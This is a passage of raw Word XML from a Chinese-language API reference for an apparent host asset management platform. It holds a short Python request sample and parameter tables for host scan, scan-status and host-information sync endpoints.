        <w:t xml:space="preserve">(method=method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host_linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/api/assets/host/linux?agentId=9d64f73542a1c78f&amp;hostname=slave&amp;ip=192.168.78.131&amp;agentStatus=1" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '9d64f73542a1c78f', 'hostname': 'slave', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '192.168.78.131', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': 1}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host_linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28607378" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc115166088"/>
      <w:bookmarkStart w:id="28" w:name="主机信息扫描"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:t>主机信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="173A8761" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求主机信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B686456" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDE17C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/host/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1941F8CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F247A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B2DB0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8A93AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/host/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7250741E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1383910C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39602D6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BBDE61"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774F0E05"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462D0C1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ED9CD67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74A9BE5C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EF8B660" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16794A88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12F272C2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4935892D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25DC4D61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F914766" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="536CE0A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A293006" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc115166089"/>
      <w:bookmarkStart w:id="30" w:name="主机信息查询状态扫描"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:t>主机信息查询状态扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="19245530" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询主机信息的扫描状态；具体请求方式参照 3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E4C16B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc115166090"/>
      <w:bookmarkStart w:id="32" w:name="主机信息同步接口"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:t>主机信息同步接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="5FDCFB70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于把外部的主机信息，同步到主机表中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA6E229" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3F1D02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/host/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostInfoSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C488E98"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552"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="7079"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="39F89BD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6935840" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DAD72FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1220D7F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1109A481" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7AAAC133" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="117E6830" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="396FA2F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ACB0FE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B2D0F25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机Ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="18DB30E3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03C2BBAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60A61F3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6008F64B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52DD8F9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="41B50E12" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BEF2672" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>assetLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10A29CD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49669048" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EBA0740" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>资产等级（普通资产，重要资产，核心资产）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="302EAB16" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59E9B110" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chargeName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="753A9B8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="646EBA9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F99751" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>负责人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="18E48360" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0966285D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chargeEmail</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F272232" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B57AAAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D3AEEB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>负责人邮箱</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="458FE406" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1190C9C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>hostLocation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A989659" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ACCDF19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3097AB35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>机房位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F7901AC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C2B96DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>assetNumber</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F479092" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27822DA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="481DEF7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>固定资产编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="39F4AD57" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="204201F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F5262CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36A55F44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="014472CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="206BA293" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AAAA30B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F3DCA63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="008A3FAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52B90E6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="487111DB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C48B612" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
